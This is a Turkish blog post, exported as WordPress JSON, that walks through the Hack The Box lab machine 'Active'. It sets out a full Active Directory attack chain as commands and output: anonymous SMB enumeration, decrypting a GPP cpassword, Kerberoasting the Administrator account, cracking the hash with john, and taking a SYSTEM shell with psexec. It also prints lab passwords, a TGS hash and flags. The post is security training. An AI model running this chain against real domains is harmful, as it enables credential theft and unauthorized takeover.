{"id":1408,"date":"2021-07-27T14:02:35","date_gmt":"2021-07-27T14:02:35","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1408"},"modified":"2021-07-27T14:02:35","modified_gmt":"2021-07-27T14:02:35","slug":"active","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/27\/active\/","title":{"rendered":"Active"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/Active\" title=\"Active\">Active<\/a> - HTB<\/td>\n<td>Kolay<\/td>\n<td>Windows<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/5837ac5e28291146a9f2a8a015540c28.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>Nmap taramas\u0131 ile ba\u015flayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">Starting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-27 08:05 EDT\nNmap scan report for 10.10.10.100\nHost is up (0.16s latency).\nNot shown: 65512 closed ports\nPORT      STATE SERVICE       VERSION\n53\/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)\n| dns-nsid: \n|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)\n88\/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-27 12:30:55Z)\n135\/tcp   open  msrpc         Microsoft Windows RPC\n139\/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn\n389\/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)\n445\/tcp   open  microsoft-ds?\n464\/tcp   open  kpasswd5?\n593\/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n636\/tcp   open  tcpwrapped\n3268\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)\n3269\/tcp  open  tcpwrapped\n5722\/tcp  open  msrpc         Microsoft Windows RPC\n9389\/tcp  open  mc-nmf        .NET Message Framing\n47001\/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n49152\/tcp open  msrpc         Microsoft Windows RPC\n49153\/tcp open  msrpc         Microsoft Windows RPC\n49154\/tcp open  msrpc         Microsoft Windows RPC\n49155\/tcp open  msrpc         Microsoft Windows RPC\n49157\/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n49158\/tcp open  msrpc         Microsoft Windows RPC\n49169\/tcp open  msrpc         Microsoft Windows RPC\n49171\/tcp open  msrpc         Microsoft Windows RPC\n49182\/tcp open  msrpc         Microsoft Windows RPC\nNo exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).\nTCP\/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=7\/27%OT=53%CT=1%CU=31977%PV=Y%DS=2%DC=T%G=Y%TM=60FFF9C\nOS:F%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=\nOS:7)SEQ(SP=105%GCD=1%ISR=109%TI=I%CI=I%II=I%TS=7)OPS(O1=M54BNW8ST11%O2=M54\nOS:BNW8ST11%O3=M54BNW8NNT11%O4=M54BNW8ST11%O5=M54BNW8ST11%O6=M54BST11)WIN(W\nOS:1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%\nOS:O=M54BNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%\nOS:T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD\nOS:=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S\nOS:=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R\nOS:=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%\nOS:RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)\n\nNetwork Distance: 2 hops\nService Info: Host: DC; OS: Windows; CPE: cpe:\/o:microsoft:windows_server_2008:r2:sp1, cpe:\/o:microsoft:windows\n\nHost script results:\n|_clock-skew: 13m01s\n| smb2-security-mode: \n|   2.02: \n|_    Message signing enabled and required\n| smb2-time: \n|   date: 2021-07-27T12:32:20\n|_  start_date: 2021-07-27T05:05:54\n\nTRACEROUTE (using port 111\/tcp)\nHOP RTT       ADDRESS\n1   189.49 ms 10.10.16.1\n2   73.41 ms  10.10.10.100\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 811.04 seconds\n<\/code><\/pre>\n<p>Bir DC oldu\u011fu \u00e7ok belli ve domain ad\u0131m\u0131z: active.htb<br \/>\nHemen smb ile enum yapmaya ba\u015flayal\u0131m. enum4linux \u00e7\u0131kt\u0131s\u0131nda dikkat \u00e7ekici olan k\u0131s\u0131mlar\u0131 a\u015fa\u011f\u0131da payla\u015f\u0131yorum.<\/p>\n<pre><code> ========================================= \n|    Share Enumeration on 10.10.10.100    |\n ========================================= \n[V] Attempting to get share list using authentication\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\n    Sharename       Type      Comment\n    ---------       ----      -------\n    ADMIN$          Disk      Remote Admin\n    C$              Disk      Default share\n    IPC$            IPC       Remote IPC\n    NETLOGON        Disk      Logon server share \n    Replication     Disk      \n    SYSVOL          Disk      Logon server share \n    Users           Disk      \nSMB1 disabled -- no workgroup available\n\n[+] Attempting to map shares on 10.10.10.100\n[V] Attempting map to share \/\/10.10.10.100\/ADMIN$ with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;ADMIN$&#039; -U&#039;&#039;%&#039;&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/ADMIN$   Mapping: DENIED, Listing: N\/A\n[V] Attempting map to share \/\/10.10.10.100\/C$ with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;C$&#039; -U&#039;&#039;%&#039;&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/C$   Mapping: DENIED, Listing: N\/A\n[V] Attempting map to share \/\/10.10.10.100\/IPC$ with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;IPC$&#039; -U&#039;&#039;%&#039;&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/IPC$ Mapping: OK Listing: DENIED\n[V] Attempting map to share \/\/10.10.10.100\/NETLOGON with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;NETLOGON&#039; -U&#039;&#039;%&#039;&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/NETLOGON Mapping: DENIED, Listing: N\/A\n[V] Attempting map to share \/\/10.10.10.100\/Replication with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;Replication&#039; -U&#039;&#039;%&#039;&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/Replication  Mapping: OK, Listing: OK\n[V] Attempting map to share \/\/10.10.10.100\/SYSVOL with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;SYSVOL&#039; -U&#039;&#039;%&#039;&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/SYSVOL   Mapping: DENIED, Listing: N\/A\n[V] Attempting map to share \/\/10.10.10.100\/Users with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;Users&#039; -U&#039;&#039;%&#039;&#039; -c dir 2&gt;&amp;1\n\/\/10.10.10.100\/Users    Mapping: DENIED, Listing: N\/A<\/code><\/pre>\n<p>smbmap ile'de kontrol etti\u011fimizde ayn\u0131 \u00e7\u0131kt\u0131lar\u0131 al\u0131yooruz.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# smbmap -u &quot;&quot; -p &quot;&quot; -H 10.10.10.100                                                                                                                                                                                                    2 \u2a2f\n[+] IP: 10.10.10.100:445    Name: unknown                                           \n        Disk                                                    Permissions Comment\n    ----                                                    ----------- -------\n    ADMIN$                                              NO ACCESS   Remote Admin\n    C$                                                  NO ACCESS   Default share\n    IPC$                                                NO ACCESS   Remote IPC\n    NETLOGON                                            NO ACCESS   Logon server share \n    Replication                                         READ ONLY   \n    SYSVOL                                              NO ACCESS   Logon server share \n    Users                                               NO ACCESS   \n<\/code><\/pre>\n<p>\u015eimdi smbclient ile i\u00e7eri girelim ve neler var neler yok bakal\u0131m. \u0130\u00e7eride group ploicy'ler vard\u0131 ve buradan kullan\u0131c\u0131 parolas\u0131 elde edebilir miyim diye d\u00fc\u015f\u00fcnmeye ba\u015flam\u0131\u015ft\u0131m. <a href=\"https:\/\/adsecurity.org\/?p=2288\">https:\/\/adsecurity.org\/?p=2288<\/a> yaz\u0131s\u0131 bu konuyu a\u00e7\u0131klamaktad\u0131r. Ara\u015ft\u0131rmalar\u0131m sonucu kullan\u0131c\u0131 verileri buldum.<\/p>\n<pre><code class=\"language-sh\">smb: \\active.htb\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Preferences\\&gt; cd Groups\\\nsmb: \\active.htb\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Preferences\\Groups\\&gt; ls\n  .                                   D        0  Sat Jul 21 06:37:44 2018\n  ..                                  D        0  Sat Jul 21 06:37:44 2018\n  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018\n\n        10459647 blocks of size 4096. 5727923 blocks available\nsmb: \\active.htb\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Preferences\\Groups\\&gt; get Groups.xml \ngetting file \\active.htb\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Preferences\\Groups\\Groups.xml of size 533 as Groups.xml (0.6 KiloBytes\/sec) (average 0.9 KiloBytes\/sec)<\/code><\/pre>\n<p>Bu dosyay\u0131 okudu\u011fumuzda <strong>SVC_TGS<\/strong> kullan\u0131c\u0131s\u0131n\u0131n parolas\u0131 k\u0131r\u0131lmay\u0131 bekliyordu.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# cat Groups.xml \n&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;\n&lt;Groups clsid=&quot;{3125E937-EB16-4b4c-9934-544FC6D24D26}&quot;&gt;&lt;User clsid=&quot;{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}&quot; name=&quot;active.htb\\SVC_TGS&quot; image=&quot;2&quot; changed=&quot;2018-07-18 20:46:06&quot; uid=&quot;{EF57DA28-5F69-4530-A59E-AAB58578219D}&quot;&gt;&lt;Properties action=&quot;U&quot; newName=&quot;&quot; fullName=&quot;&quot; description=&quot;&quot; cpassword=&quot;edBSHOwhZLTjt\/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw\/NglVmQ&quot; changeLogon=&quot;0&quot; noChange=&quot;1&quot; neverExpires=&quot;1&quot; acctDisabled=&quot;0&quot; userName=&quot;active.htb\\SVC_TGS&quot;\/&gt;&lt;\/User&gt;\n&lt;\/Groups&gt;\n<\/code><\/pre>\n<p>Yukar\u0131da vermi\u015f oldu\u011fum linkte kullan\u0131lan ps1 scriptini indirdim ve kalide powershell a\u00e7\u0131p parolay\u0131 k\u0131rd\u0131m. (<a href=\"https:\/\/raw.githubusercontent.com\/obscuresec\/PowerShell\/master\/Get-DecryptedCpassword\">https:\/\/raw.githubusercontent.com\/obscuresec\/PowerShell\/master\/Get-DecryptedCpassword<\/a>)<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# pwsh\nPowerShell 7.1.3\nCopyright (c) Microsoft Corporation.\n\nhttps:\/\/aka.ms\/powershell\nType &#039;help&#039; to get help.\n\nI\nPS \/root\/oscp\/htb\/Active&gt; ls   \n&#039;a a&#039;   enum4linuxResult   Get-DecryptedCpassword.ps1   GPE.INI   GPT.INI   GptTmpl.inf   Groups.xml\nPS \/root\/oscp\/htb\/Active&gt; Import-Module .\/Get-DecryptedCpassword.ps1\nPS \/root\/oscp\/htb\/Active&gt; Get-DecryptedCpassword &quot;edBSHOwhZLTjt\/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw\/NglVmQ&quot;\nGPPstillStandingStrong2k18\nPS \/root\/oscp\/htb\/Active&gt; exit\n<\/code><\/pre>\n<p>Art\u0131k bir kullan\u0131c\u0131ya sahibiz. \u0130\u00e7eriye hala giremiyordum bunun \u00fczerine okuyamad\u0131\u011f\u0131m payla\u015f\u0131lm\u0131\u015f klas\u00f6rleri belki bu kullan\u0131c\u0131 ile okurum diye tekrar smb enum yapt\u0131m.<\/p>\n<pre><code> ========================================= \n|    Share Enumeration on 10.10.10.100    |\n ========================================= \n[V] Attempting to get share list using authentication\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\n    Sharename       Type      Comment\n    ---------       ----      -------\n    ADMIN$          Disk      Remote Admin\n    C$              Disk      Default share\n    IPC$            IPC       Remote IPC\n    NETLOGON        Disk      Logon server share \n    Replication     Disk      \n    SYSVOL          Disk      Logon server share \n    Users           Disk      \nSMB1 disabled -- no workgroup available\n\n[+] Attempting to map shares on 10.10.10.100\n[V] Attempting map to share \/\/10.10.10.100\/ADMIN$ with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;ADMIN$&#039; -U&#039;SVC_TGS&#039;%&#039;GPPstillStandingStrong2k18&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/ADMIN$   Mapping: DENIED, Listing: N\/A\n[V] Attempting map to share \/\/10.10.10.100\/C$ with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;C$&#039; -U&#039;SVC_TGS&#039;%&#039;GPPstillStandingStrong2k18&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/C$   Mapping: DENIED, Listing: N\/A\n[V] Attempting map to share \/\/10.10.10.100\/IPC$ with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;IPC$&#039; -U&#039;SVC_TGS&#039;%&#039;GPPstillStandingStrong2k18&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/IPC$ [E] Can&#039;t understand response:\nNT_STATUS_INVALID_PARAMETER listing \\*\n[V] Attempting map to share \/\/10.10.10.100\/NETLOGON with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;NETLOGON&#039; -U&#039;SVC_TGS&#039;%&#039;GPPstillStandingStrong2k18&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/NETLOGON Mapping: OK, Listing: OK\n[V] Attempting map to share \/\/10.10.10.100\/Replication with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;Replication&#039; -U&#039;SVC_TGS&#039;%&#039;GPPstillStandingStrong2k18&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/Replication  Mapping: OK, Listing: OK\n[V] Attempting map to share \/\/10.10.10.100\/SYSVOL with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;SYSVOL&#039; -U&#039;SVC_TGS&#039;%&#039;GPPstillStandingStrong2k18&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/SYSVOL   Mapping: OK, Listing: OK\n[V] Attempting map to share \/\/10.10.10.100\/Users with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;Users&#039; -U&#039;SVC_TGS&#039;%&#039;GPPstillStandingStrong2k18&#039; -c dir 2&gt;&amp;1\n\/\/10.10.10.100\/Users    Mapping: OK, Listing: OK<\/code><\/pre>\n<p>Elimizdeki kulla\u0131c\u0131yla daha fazla haklara ahibiz.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# smbmap -u &quot;SVC_TGS&quot; -p &quot;GPPstillStandingStrong2k18&quot; -H 10.10.10.100                                                                                                                                                                   1 \u2a2f\n[+] IP: 10.10.10.100:445    Name: 10.10.10.100                                      \n        Disk                                                    Permissions Comment\n    ----                                                    ----------- -------\n    ADMIN$                                              NO ACCESS   Remote Admin\n    C$                                                  NO ACCESS   Default share\n    IPC$                                                NO ACCESS   Remote IPC\n    NETLOGON                                            READ ONLY   Logon server share \n    Replication                                         READ ONLY   \n    SYSVOL                                              READ ONLY   Logon server share \n    Users                                               READ ONLY<\/code><\/pre>\n<p>\u0130lk flagi b\u00f6ylece alm\u0131\u015f oldum.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;Users&#039; -U&#039;SVC_TGS&#039;%&#039;GPPstillStandingStrong2k18&#039; 2&gt;&amp;1\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  .                                  DR        0  Sat Jul 21 10:39:20 2018\n  ..                                 DR        0  Sat Jul 21 10:39:20 2018\n  Administrator                       D        0  Mon Jul 16 06:14:21 2018\n  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009\n  Default                           DHR        0  Tue Jul 14 02:38:21 2009\n  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009\n  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009\n  Public                             DR        0  Tue Jul 14 00:57:55 2009\n  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018\n\n        10459647 blocks of size 4096. 5727623 blocks available\nsmb: \\&gt; cd SVC_TGS\\\nsmb: \\SVC_TGS\\&gt; ls\n  .                                   D        0  Sat Jul 21 11:16:32 2018\n  ..                                  D        0  Sat Jul 21 11:16:32 2018\n  Contacts                            D        0  Sat Jul 21 11:14:11 2018\n  Desktop                             D        0  Sat Jul 21 11:14:42 2018\n  Downloads                           D        0  Sat Jul 21 11:14:23 2018\n  Favorites                           D        0  Sat Jul 21 11:14:44 2018\n  Links                               D        0  Sat Jul 21 11:14:57 2018\n  My Documents                        D        0  Sat Jul 21 11:15:03 2018\n  My Music                            D        0  Sat Jul 21 11:15:32 2018\n  My Pictures                         D        0  Sat Jul 21 11:15:43 2018\n  My Videos                           D        0  Sat Jul 21 11:15:53 2018\n  Saved Games                         D        0  Sat Jul 21 11:16:12 2018\n  Searches                            D        0  Sat Jul 21 11:16:24 2018\ncd \n        10459647 blocks of size 4096. 5727623 blocks available\nsmb: \\SVC_TGS\\&gt; cd Desktop\\\nlsmb: \\SVC_TGS\\Desktop\\&gt; ls\n  .                                   D        0  Sat Jul 21 11:14:42 2018\n  ..                                  D        0  Sat Jul 21 11:14:42 2018\n  user.txt                            A       34  Sat Jul 21 11:06:25 2018\n\n        10459647 blocks of size 4096. 5727623 blocks available\nsmb: \\SVC_TGS\\Desktop\\&gt; get user.txt\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# cat user.txt \n86d67d8ba232bb6a254aa4d10159e983\n<\/code><\/pre>\n<p>Art\u0131k \u0131kanm\u0131\u015ft\u0131m ve bloodhound'\u0131 \u00e7al\u0131\u015ft\u0131rd\u0131m. LDAP sorgular\u0131 ile bilgi toplama zaman\u0131.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active\/bloodhound]\n\u2514\u2500# bloodhound-python -u SVC_TGS -p GPPstillStandingStrong2k18 -d active.htb  -ns 10.10.10.100  -c all           \nINFO: Found AD domain: active.htb\nINFO: Connecting to LDAP server: dc.active.htb\nINFO: Found 1 domains\nINFO: Found 1 domains in the forest\nINFO: Found 1 computers\nINFO: Connecting to LDAP server: dc.active.htb\nINFO: Found 4 users\nINFO: Found 40 groups\nINFO: Found 0 trusts\nINFO: Starting computer enumeration with 10 workers\nINFO: Querying computer: DC.active.htb\n<\/code><\/pre>\n<p>Bloodhound incelemelerimde Administrator kullan\u0131c\u0131s\u0131n\u0131n SPN d\u011feri oldu\u011funu ke\u015ffettim. Bunun \u00fczerine hemen hash talebinde bulundum. Ancak hata ald\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# python3 \/root\/tool\/AD\/impacket\/examples\/GetUserSPNs.py active.htb\/SVC_TGS:GPPstillStandingStrong2k18 -request                                                                                                                         1 \u2a2f\nImpacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation\n\nServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation \n--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------\nactive\/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783             \n\n[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)<\/code><\/pre>\n<p>B\u00f6yle bir hata ald\u0131\u011f\u0131n\u0131zda zaman de\u011ferimizi DC ile e\u015fitlelememiz gerekiyor.(<a href=\"https:\/\/book.hacktricks.xyz\/windows\/active-directory-methodology\/kerberoast\">https:\/\/book.hacktricks.xyz\/windows\/active-directory-methodology\/kerberoast<\/a>)<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# ntpdate 10.10.10.100                \n27 Jul 09:51:18 ntpdate[2257]: step time server 10.10.10.100 offset +781.865165 sec<\/code><\/pre>\n<p>Tekrar deneyelim.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# cat \/etc\/resolv.conf\nnameserver 10.10.10.100\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# python3 \/root\/tool\/AD\/impacket\/examples\/GetUserSPNs.py active.htb\/SVC_TGS:GPPstillStandingStrong2k18 -request\nImpacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation\n\nServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation \n--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------\nactive\/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783             \n\n$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\/Administrator*$27a9be7702cf025d854f726fe25fdffd$a127e1b0d9ed078c32358ae41887465201c909d4e8ce32b95e708b421c53a5b9e290f2a6ba1cdc96d1ce95adf32c8559672c7a2d870c2b6db4f412561dd983cca2fcbc4c065e2a90068d285a3724cdc9231121eed47404dde01dcd2209b86379c13ab5c1d167cc6acd679c827f0ba1e5d5b513050e8bd6d2e7b9a35ae78ed26355832819ac348123cbd1c7269ff328c7c061dc28e743dca66a5d701da71cf7390a6acf00f9d1679d5fc6e7741f71e2d2b3bb751cdaa389756461423e2c8545c116f816a51e8efbbd0fe5b83cee135f9f870889cf9deeedd03da60155e92aa08c8fc73c1a6da5b591972409fe7eaa3d0908e04cde1060c3f8a6e4c5e2d1fac10fa5e2d6e042c054ed186553d1c08606b27fdf2bdaf3962c794c57423d4aecbc7eda24417cb41a125ba13fe4b8a4dfde5c600132f846d25b28d215118db3bb13b21f20d3661e7bd06a4ef1b287bc828303fda8e7e23d415a512b5e274282af3491309a146624d7078a1b7d206b3bc674ee5b0594324c4e2f47fc2594e076c018b41e357d6e28086b9221fa84fe75f2e31230108261fcd1e2e861f850ba13b8bb62f2951d58f0aa35dfec0ac4cbe3c328169fcfdf1af0f58aec8adc4e912b4e94c85f31bc6a322ec583c520ce3951f17da872f021cc2b1a94daa1a223d7151d242617640452b374b79cb0fff429c4a6cf944c6b6565b275bc9ace246fb86fac6f9ecb417a87bb258e848126edda737dbbcaaa7d2c55dfde8c02f0511007b445cbfa93f2cd036081418b08dff899543c875f11810ff730dd0c503c87bd1c1705ceec297a3e62f5f0cfa9a466833799bdd072546686d35010937c27b5f94f22384cd7be16a24920fd58bc6421c45962eddf9b9aaba4c3dc89f5896bf1d9f87bd26b55eac96603de1ad65dd4036b3ba64b1160411946e41a54e088b127f4e17b70f8660bdde4a0adaddbbf4c9f8f262c2e98f7ad66f79c870b9d1f06c0bf5cf19f1386f18f3eec0865c256c54645ec90237b9841cfe5ad0ecea41b7755330b7e065636b96d84c6bdcb66029b8c5327fc32df3a036631bc406f485ea9e919ad0e06c8cc1c1bd3fc8507612c8d4c7af0ce1707fe0bb00966d846202c7116a49aebbbda02e5451693a3f17665a69127c438bfef8c07606e83e468c701d723a18705bfc83d0e4e48bd58464eb20eb6680c1537b7c61ad6a25aefab47605533f0c8fd44acaf98cc002dee0cc221c93148df0ab4a9a330381d04ce891e6588ef<\/code><\/pre>\n<p>Harika \u015fimdi bunu k\u0131ral\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# john hash --wordlist=\/usr\/share\/wordlists\/rockyou.txt                                                                                                                                                                                 1 \u2a2f\nUsing default input encoding: UTF-8\nLoaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])\nWill run 4 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nTicketmaster1968 (?)\n1g 0:00:00:04 DONE (2021-07-27 09:52) 0.2132g\/s 2246Kp\/s 2246Kc\/s 2246KC\/s Tiffani1432..Thrash1\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/tool\/AD\/impacket\/examples]\n\u2514\u2500# python3 psexec.py Administrator:Ticketmaster1968@10.10.10.100                                \nImpacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation\n\n[*] Requesting shares on 10.10.10.100.....\n[*] Found writable share ADMIN$\n[*] Uploading file ONeZjpOH.exe\n[*] Opening SVCManager on 10.10.10.100.....\n[*] Creating service iDPJ on 10.10.10.100.....\n[*] Starting service iDPJ.....\n[!] Press help for extra shell commands\nMicrosoft Windows [Version 6.1.7601]\nCopyright (c) 2009 Microsoft Corporation.  All rights reserved.\n\nC:\\Windows\\system32&gt;whoami\nnt authority\\system\n\nC:\\Windows\\system32&gt;cd C:\\Users\\Administrator\\Desktop\\\n\nC:\\Users\\Administrator\\Desktop&gt;dir\n Volume in drive C has no label.\n Volume Serial Number is 2AF3-72E4\n\n Directory of C:\\Users\\Administrator\\Desktop\n\n21\/01\/2021  07:49 \u00fa\u00fa    &lt;DIR&gt;          .\n21\/01\/2021  07:49 \u00fa\u00fa    &lt;DIR&gt;          ..\n21\/07\/2018  06:06 \u00fa\u00fa                34 root.txt\n               1 File(s)             34 bytes\n               2 Dir(s)  23.460.220.928 bytes free\n\nC:\\Users\\Administrator\\Desktop&gt;type root.txt\nb5fc76d1d6b91d77b2fbf2d54d0f708b\n\nC:\\Users\\Administrator\\Desktop&gt;\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Active &#8211; HTB Kolay Windows Walkthrough Nmap taramas\u0131 ile 